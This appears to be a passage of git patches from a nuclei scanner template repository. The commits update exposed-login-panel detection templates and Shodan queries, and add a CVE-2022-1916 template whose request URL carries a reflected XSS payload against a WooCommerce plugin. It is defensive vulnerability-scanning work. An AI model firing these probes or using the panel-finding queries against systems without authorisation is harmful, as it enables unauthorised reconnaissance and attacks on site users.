requests: - type: word words: - 'Kafka Connect UI' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kafka-consumer-monitor.yaml b/exposed-panels/kafka-consumer-monitor.yaml index 2acf11ebd1..91c6176833 100644 --- a/exposed-panels/kafka-consumer-monitor.yaml +++ b/exposed-panels/kafka-consumer-monitor.yaml @@ -1,9 +1,14 @@ id: kafka-consumer-monitor info: - name: Kafka Consumer Offset Monitor Exposure + name: Apache Kafka Consumer Offset Monitor Panel - Detect author: dhiyaneshDK severity: low + description: Apache Kafka Consumer Offset Monitor panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Kafka Consumer Offset Monitor" tags: panel,kafka @@ -18,4 +23,6 @@ requests: matchers: - type: word words: - - 'Kafka Consumer Offset Monitor' \ No newline at end of file + - 'Kafka Consumer Offset Monitor' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml index c59b3e3920..73af591d21 100644 --- a/exposed-panels/kafka-monitoring.yaml +++ b/exposed-panels/kafka-monitoring.yaml @@ -1,9 +1,14 @@ id: kafka-monitoring info: - name: Apache Kafka Monitor Exposure + name: Apache Kafka Monitor Login Panel - Detect author: pdteam severity: low + description: Apache Kafka Monitor login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kafka,apache requests: @@ -16,3 +21,5 @@ requests: words: - '>KafkaMonitor' - '>Kafka Monitor GUI

' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml index 573fd0d6dd..d8b199a567 100644 --- a/exposed-panels/kafka-topics-ui.yaml +++ b/exposed-panels/kafka-topics-ui.yaml @@ -1,9 +1,14 @@ id: kafka-topics-ui info: - name: Apache Kafka Topics UI Exposure + name: Apache Kafka Topics Panel - Detect author: pdteam severity: low + description: Apache Kafka Topics panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kafka,apache requests: @@ -15,3 +20,5 @@ requests: - type: word words: - 'Kafka Topics UI - Browse Kafka Data' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kavita-panel-detect.yaml b/exposed-panels/kavita-panel-detect.yaml index 83a42fb467..79989a750d 100644 --- a/exposed-panels/kavita-panel-detect.yaml +++ b/exposed-panels/kavita-panel-detect.yaml @@ -1,13 +1,17 @@ id: kavita-panel-detect info: - name: Kavita Panel Detect + name: Kavita Login Panel - Detect author: ritikchaddha severity: info description: | - Kavita is a fast, feature rich, cross platform reading server. Built with a focus for manga, and the goal of being a full solution for all your reading needs. + Kavita login panel was detected. reference: - https://github.com/kareadita/kavita + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"kavita" @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/keenetic-web-login.yaml b/exposed-panels/keenetic-web-login.yaml index 31b0e26465..5a5992626e 100644 --- a/exposed-panels/keenetic-web-login.yaml +++ b/exposed-panels/keenetic-web-login.yaml @@ -1,11 +1,16 @@ id: keenetic-web-login info: - name: Keenetic Web Login + name: Keenetic Web Login Panel - Detect author: dhiyaneshDK severity: info + description: Keenetic Web login panel was detected. reference: - https://www.exploit-db.com/ghdb/6817 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,keenetic,edb requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml index 33de716bbc..07a2ebe919 100644 --- a/exposed-panels/kentico-login.yaml +++ b/exposed-panels/kentico-login.yaml @@ -1,11 +1,16 @@ id: kentico-login info: - name: Kentico Login Panel + name: Kentico Login Panel - Detect author: d4vy severity: info + description: Kentico login panel was detected. reference: - https://docs.xperience.io/k8/using-the-kentico-interface + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login,kentico requests: @@ -21,4 +26,6 @@ requests: dsl: - "status_code==200" - "contains(tolower(body), 'cmspages/getresource.ashx')" - condition: and \ No newline at end of file + condition: and + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kerio-connect-client.yaml b/exposed-panels/kerio-connect-client.yaml index b4c0aa48a7..0e3c0b00c6 100644 --- a/exposed-panels/kerio-connect-client.yaml +++ b/exposed-panels/kerio-connect-client.yaml @@ -1,9 +1,14 @@ id: kerio-connect-client info: - name: Kerio Connect Client + name: Kerio Connect Login Panel - Detect author: dhiyaneshDk severity: info + description: Kerio Connect login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Kerio Connect Client" tags: panel,kerio @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kettle-panel.yaml b/exposed-panels/kettle-panel.yaml index df56a1682d..93ada87c51 100644 --- a/exposed-panels/kettle-panel.yaml +++ b/exposed-panels/kettle-panel.yaml @@ -1,9 +1,14 @@ id: kettle-panel info: - name: Kettle Panel + name: Kettle Panel - Detect author: For3stCo1d severity: info + description: Kettle panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: basic realm="Kettle" @@ -19,3 +24,5 @@ requests: part: header words: - 'basic realm="Kettle"' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/key-cloak-admin-panel.yaml b/exposed-panels/key-cloak-admin-panel.yaml index 778c03b7cc..8eaa019a06 100644 --- a/exposed-panels/key-cloak-admin-panel.yaml +++ b/exposed-panels/key-cloak-admin-panel.yaml @@ -1,9 +1,14 @@ id: key-cloak-admin-panel info: - name: Keycloak Admin Panel + name: Keycloak Admin Login Panel - Detect author: incogbyte,righettod,daffainfo severity: info + description: Keycloak admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-1105083093 @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kfm/kaes-file-manager.yaml b/exposed-panels/kfm/kaes-file-manager.yaml index 5d4b087a7f..d63598bf22 100644 --- a/exposed-panels/kfm/kaes-file-manager.yaml +++ b/exposed-panels/kfm/kaes-file-manager.yaml @@ -1,9 +1,14 @@ id: kaes-file-manager info: - name: Kae's File Manager + name: Kae's File Manager Login Panel - Detect author: princechaddha severity: unknown + description: Kae's File Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kaes,filemanager,kfm requests: @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kfm/kfm-login-panel.yaml b/exposed-panels/kfm/kfm-login-panel.yaml index 6178391846..32f796ef83 100644 --- a/exposed-panels/kfm/kfm-login-panel.yaml +++ b/exposed-panels/kfm/kfm-login-panel.yaml @@ -1,9 +1,14 @@ id: kfm-login-panel info: - name: Kae's Login Panel + name: Kae's File Manager Admin Login Panel - Detect author: princechaddha severity: info + description: Kae's File Manager admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kfm requests: @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml index b06e862fe6..71f7bf2e25 100644 --- a/exposed-panels/kibana-panel.yaml +++ b/exposed-panels/kibana-panel.yaml @@ -1,9 +1,14 @@ id: kibana-panel info: - name: Kibana Panel Login + name: Kibana Login Panel - Detect author: petruknisme,daffainfo,c-sh0 severity: info + description: Kibana login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Kibana" tags: panel,kibana @@ -32,3 +37,5 @@ requests: part: header regex: - '(?i)(Kbn-Name)' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kiwitcms-login.yaml b/exposed-panels/kiwitcms-login.yaml index 694cc0dd9a..416a406a57 100644 --- a/exposed-panels/kiwitcms-login.yaml +++ b/exposed-panels/kiwitcms-login.yaml @@ -1,11 +1,16 @@ id: kiwitcms-login info: - name: Kiwi TCMS Login + name: Kiwi TCMS Login Panel - Detect author: pdteam severity: info + description: Kiwi TCMS login panel was detected. reference: - https://kiwitcms.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 tags: kiwitcms,panel @@ -24,4 +29,6 @@ requests: - type: regex group: 1 regex: - - "Version ([0-9.]+)" \ No newline at end of file + - "Version ([0-9.]+)" + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kkfileview-panel.yaml b/exposed-panels/kkfileview-panel.yaml index b7a5ccac81..14f08df290 100644 --- a/exposed-panels/kkfileview-panel.yaml +++ b/exposed-panels/kkfileview-panel.yaml @@ -1,9 +1,14 @@ id: kkfileview-panel info: - name: kkFileView Panel Detect + name: kkFileView Panel - Detect author: arafatansari severity: info + description: kkFileView panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"kkFileView" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kronos-workforce-central.yaml b/exposed-panels/kronos-workforce-central.yaml index 797ee58906..eef1ab4812 100644 --- a/exposed-panels/kronos-workforce-central.yaml +++ b/exposed-panels/kronos-workforce-central.yaml @@ -1,9 +1,14 @@ id: kronos-workforce-central info: - name: Kronos Workforce Central Panel + name: Kronos Workforce Central Login Panel - Detect author: emadshanab severity: info + description: Kronos Workforce Central login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kronos requests: @@ -15,3 +20,5 @@ requests: - type: word words: - 'Kronos Workforce Central' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml index ac7cfb461e..09e166fa97 100644 --- a/exposed-panels/kubernetes-dashboard.yaml +++ b/exposed-panels/kubernetes-dashboard.yaml @@ -1,9 +1,14 @@ id: kubernetes-dashboard info: - name: Kubernetes Console Exposure + name: Kubernetes Dashboard Panel - Detect author: pdteam severity: low + description: Kubernetes Dashboard panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kubernetes,devops requests: @@ -14,3 +19,5 @@ requests: - type: word words: - "Kubernetes Dashboard" + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/labkey-server-login.yaml b/exposed-panels/labkey-server-login.yaml index 5806df9566..30b38d66a1 100644 --- a/exposed-panels/labkey-server-login.yaml +++ b/exposed-panels/labkey-server-login.yaml @@ -1,9 +1,14 @@ id: labkey-server-login info: - name: LabKey Server Login + name: LabKey Server Login Panel - Detect author: tess severity: info + description: LabKey Server login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: 'title:"Sign In: /home"' @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/labtech-panel.yaml b/exposed-panels/labtech-panel.yaml index 5018a7afe9..fb14396a61 100644 --- a/exposed-panels/labtech-panel.yaml +++ b/exposed-panels/labtech-panel.yaml @@ -1,9 +1,14 @@ id: labtech-panel info: - name: LabTech Web Portal + name: LabTech Web Portal Login Panel - Detect author: deFr0ggy severity: info + description: LabTech Web Portal login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,labtech requests: @@ -29,3 +34,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/22 From 523f0849827c6c3759acfacbe4cce014b7850cb0 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 23 Nov 2022 06:52:16 +0100 Subject: [PATCH 0541/1415] Add missing term to detect Cisco Expressway-E (#6132) --- technologies/fingerprinthub-web-fingerprints.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml index b0e945fa0b..c0c0749efa 100755 --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -2,7 +2,7 @@ id: fingerprinthub-web-fingerprints info: name: FingerprintHub Technology Fingerprint - author: pdteam + author: pdteam,righettod severity: info description: FingerprintHub Technology Fingerprint tests run in nuclei. reference: @@ -1986,6 +1986,7 @@ requests: name: cisco-expressway words: - expressway-e + - "Cisco Expressway-E" - type: word name: cisco-imc-supervisor From 5f46d6c206de6297a14e729ad04c6ff9473b2903 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 12:31:40 +0530 Subject: [PATCH 0543/1415] Update dropbear-weakalgo-detect.yaml --- network/detection/dropbear-weakalgo-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/detection/dropbear-weakalgo-detect.yaml b/network/detection/dropbear-weakalgo-detect.yaml index b785ea1ec7..f99d6da0fd 100644 --- a/network/detection/dropbear-weakalgo-detect.yaml +++ b/network/detection/dropbear-weakalgo-detect.yaml @@ -6,6 +6,8 @@ info: severity: low description: | The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. + reference: | + https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled/ metadata: verified: true shodan-query: 'product:"Dropbear sshd"' From fa96ca1a4158f929bf56819da46ac182868213d8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 12:32:38 +0530 Subject: [PATCH 0544/1415] Update dropbear-cbc-ciphers.yaml --- network/detection/dropbear-cbc-ciphers.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index 49ead75eae..8cdc1d16a7 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -6,6 +6,8 @@ info: severity: low description: | The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext. + reference: | + https://www.tenable.com/plugins/nessus/70658 metadata: verified: true shodan-query: 'product:"Dropbear sshd"' From d076e3aa19f361a832c2ff26afee7f1fca0f5b66 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 12:34:04 +0530 Subject: [PATCH 0545/1415] Update dropbear-weakmac-detect.yaml --- network/detection/dropbear-weakmac-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/detection/dropbear-weakmac-detect.yaml b/network/detection/dropbear-weakmac-detect.yaml index dde957d983..5b199aa892 100644 --- a/network/detection/dropbear-weakmac-detect.yaml +++ b/network/detection/dropbear-weakmac-detect.yaml @@ -6,6 +6,8 @@ info: severity: low description: | The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. + reference: | + https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled metadata: verified: true shodan-query: 'product:"Dropbear sshd"' From 61b6695597a0a1e0254e499b1e36c38a563a4a64 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 23 Nov 2022 12:34:47 +0530 Subject: [PATCH 0546/1415] Update dropbear-weakalgo-detect.yaml --- network/detection/dropbear-weakalgo-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/dropbear-weakalgo-detect.yaml b/network/detection/dropbear-weakalgo-detect.yaml index f99d6da0fd..855f8248ae 100644 --- a/network/detection/dropbear-weakalgo-detect.yaml +++ b/network/detection/dropbear-weakalgo-detect.yaml @@ -7,7 +7,7 @@ info: description: | The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. reference: | - https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled/ + https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled metadata: verified: true shodan-query: 'product:"Dropbear sshd"' From 003bf098dd37fcccc94a035f65f0bb651b8a583f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 23 Nov 2022 13:05:21 +0530 Subject: [PATCH 0547/1415] Update and rename technologies/exolis-engage-detect.yaml to exposed-panels/exolis-engage-detect.yaml --- {technologies => exposed-panels}/exolis-engage-detect.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename {technologies => exposed-panels}/exolis-engage-detect.yaml (83%) diff --git a/technologies/exolis-engage-detect.yaml b/exposed-panels/exolis-engage-detect.yaml similarity index 83% rename from technologies/exolis-engage-detect.yaml rename to exposed-panels/exolis-engage-detect.yaml index c030aac392..6c495f836a 100644 --- a/technologies/exolis-engage-detect.yaml +++ b/exposed-panels/exolis-engage-detect.yaml @@ -1,14 +1,14 @@ -id: exolis-engage +id: exolis-engage-panel info: - name: Detect instance of the Engage software from the Exolis company. + name: Exolis Engage Panel author: righettod severity: info reference: - https://www.exolis.fr/en/solution-2/ metadata: verified: true - tags: exolis,engage,tech + tags: panel,exolis,engage requests: - method: GET From 5df19a2831b3038214411eaa8ad7f9262eadbd60 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 23 Nov 2022 13:06:04 +0530 Subject: [PATCH 0548/1415] Update and rename exolis-engage-detect.yaml to exolis-engage-panel.yaml --- .../{exolis-engage-detect.yaml => exolis-engage-panel.yaml} | 2 ++ 1 file changed, 2 insertions(+) rename exposed-panels/{exolis-engage-detect.yaml => exolis-engage-panel.yaml} (86%) diff --git a/exposed-panels/exolis-engage-detect.yaml b/exposed-panels/exolis-engage-panel.yaml similarity index 86% rename from exposed-panels/exolis-engage-detect.yaml rename to exposed-panels/exolis-engage-panel.yaml index 6c495f836a..1b151f0993 100644 --- a/exposed-panels/exolis-engage-detect.yaml +++ b/exposed-panels/exolis-engage-panel.yaml @@ -8,6 +8,8 @@ info: - https://www.exolis.fr/en/solution-2/ metadata: verified: true + shodan-query: html:"engage - Portail soignant" + google-dork: intitle:"engage - Portail soignant" tags: panel,exolis,engage requests: From b4d56cc6eec3ce5f9cbc6a98af87eedbff40dd63 Mon Sep 17 00:00:00 2001 From: Kishore Hariram <36239971+kishore-hariram@users.noreply.github.com> Date: Wed, 23 Nov 2022 08:36:46 +0000 Subject: [PATCH 0549/1415] I have added a new CMS detection template. This is a template for detecting the CMS named Nuxeo. --- technologies/nuxeo-cms-detection.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/nuxeo-cms-detection.yaml diff --git a/technologies/nuxeo-cms-detection.yaml b/technologies/nuxeo-cms-detection.yaml new file mode 100644 index 0000000000..53855ab38c --- /dev/null +++ b/technologies/nuxeo-cms-detection.yaml @@ -0,0 +1,24 @@ +id: nuxeo-web-console-detection + +info: + name: Nuxeo Platform web console detection + author: kishore-hariram + severity: info + tags: technologies,nuxeo + +requests: + - method: GET + path: + - "{{BaseURL}}/nuxeo/login.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Nuxeo Platform" + + + - type: status + status: + - 200 \ No newline at end of file From 909aa94f9cd4f7b8eca502a7f895d900a368e8ad Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 23 Nov 2022 14:07:45 +0530 Subject: [PATCH 0550/1415] Create CVE-2022-1916.yaml --- cves/2022/CVE-2022-1916.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2022/CVE-2022-1916.yaml diff --git a/cves/2022/CVE-2022-1916.yaml b/cves/2022/CVE-2022-1916.yaml new file mode 100644 index 0000000000..4eecbfb492 --- /dev/null +++ b/cves/2022/CVE-2022-1916.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-1916 + +info: + name: Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-Scripting + author: Akincibor + severity: medium + description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808 + tags: xss,wp,wordpress + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 73834e59cc4ed524f8049578d2b8539d0a2a73c8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 23 Nov 2022 14:08:54 +0530 Subject: [PATCH 0551/1415] Update CVE-2022-1916.yaml --- cves/2022/CVE-2022-1916.yaml | 18 +++++++++++++++--- 1 file changed, 15 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-1916.yaml b/cves/2022/CVE-2022-1916.yaml index 4eecbfb492..d2d7d36855 100644 --- a/cves/2022/CVE-2022-1916.yaml +++ b/cves/2022/CVE-2022-1916.yaml @@ -1,13 +1,17 @@ id: CVE-2022-1916 info: - name: Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-Scripting + name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting author: Akincibor severity: medium - description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting. + description: | + The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting. reference: - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808 - tags: xss,wp,wordpress + - https://nvd.nist.gov/vuln/detail/CVE-2022-1916 + classification: + cve-id: CVE-2022-1916 + tags: cve,cve2022,wp,wordpress,wp-plugin,xss requests: - method: GET @@ -21,6 +25,14 @@ requests: words: - '' + - type: word + part: body + words: + - 'woot-content-in-popup' + - 'woot-system' + - 'woot-table' + condition: or + - type: word part: header words: From 0dbb4f07b69e3df7772ced57ed7244131e5be733 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 23 Nov 2022 08:56:41 +0000 Subject: [PATCH 0552/1415] Auto Generated CVE annotations [Wed Nov 23 08:56:41 UTC 2022] :robot: --- cves/2022/CVE-2022-3484.yaml | 5 ++++- cves/2022/CVE-2022-3578.yaml | 5 ++++- cves/2022/CVE-2022-41840.yaml | 10 ++++++++-- 3 files changed, 16 insertions(+), 4 deletions(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index f38e355c56..4398c2aae1 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -10,10 +10,13 @@ info: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-3484 + cwe-id: CWE-79 metadata: - verified: true google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php + verified: "true" tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress requests: diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index fa202c5b49..fb65fa2963 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -11,9 +11,12 @@ info: - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-3578 + cwe-id: CWE-79 metadata: - verified: true + verified: "true" tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 requests: diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml index a41cd1af55..b664082bef 100644 --- a/cves/2022/CVE-2022-41840.yaml +++ b/cves/2022/CVE-2022-41840.yaml @@ -3,15 +3,21 @@ id: CVE-2022-41840 info: name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal author: theamanrawat - severity: high + severity: critical + description: | + Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress. reference: - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability - https://wordpress.org/plugins/usc-e-shop/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840 + - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-41840 + cwe-id: CWE-22 metadata: - verified: true + verified: "true" tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop requests: From db109da86f6235dc24e37201c5ac9b0d93c9ce86 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 23 Nov 2022 14:33:39 +0530 Subject: [PATCH 0553/1415] Update and rename technologies/nuxeo-cms-detection.yaml to exposed-panels/nuxeo-platform-login.yaml --- exposed-panels/nuxeo-platform-login.yaml | 24 ++++++++++++++++++++++++ technologies/nuxeo-cms-detection.yaml | 24 ------------------------ 2 files changed, 24 insertions(+), 24 deletions(-) create mode 100644 exposed-panels/nuxeo-platform-login.yaml delete mode 100644 technologies/nuxeo-cms-detection.yaml diff --git a/exposed-panels/nuxeo-platform-login.yaml b/exposed-panels/nuxeo-platform-login.yaml new file mode 100644 index 0000000000..8ed2554404 --- /dev/null +++ b/exposed-panels/nuxeo-platform-login.yaml @@ -0,0 +1,24 @@ +id: nuxeo-platform-login + +info: + name: Nuxeo Platform Login + author: kishore-hariram + severity: info + metadata: + shodan-query: title:"Nuxeo Platform" + tags: panel,nuxeo + +requests: + - method: GET + path: + - "{{BaseURL}}/nuxeo/login.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - "Nuxeo Platform" + + - type: status + status: + - 200 diff --git a/technologies/nuxeo-cms-detection.yaml b/technologies/nuxeo-cms-detection.yaml deleted file mode 100644 index 53855ab38c..0000000000 --- a/technologies/nuxeo-cms-detection.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: nuxeo-web-console-detection - -info: - name: Nuxeo Platform web console detection - author: kishore-hariram - severity: info - tags: technologies,nuxeo - -requests: - - method: GET - path: - - "{{BaseURL}}/nuxeo/login.jsp" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Nuxeo Platform" - - - - type: status - status: - - 200 \ No newline at end of file From a6bca930cde93d014f1667cc90c30edc00c21947 Mon Sep 17 00:00:00 2001 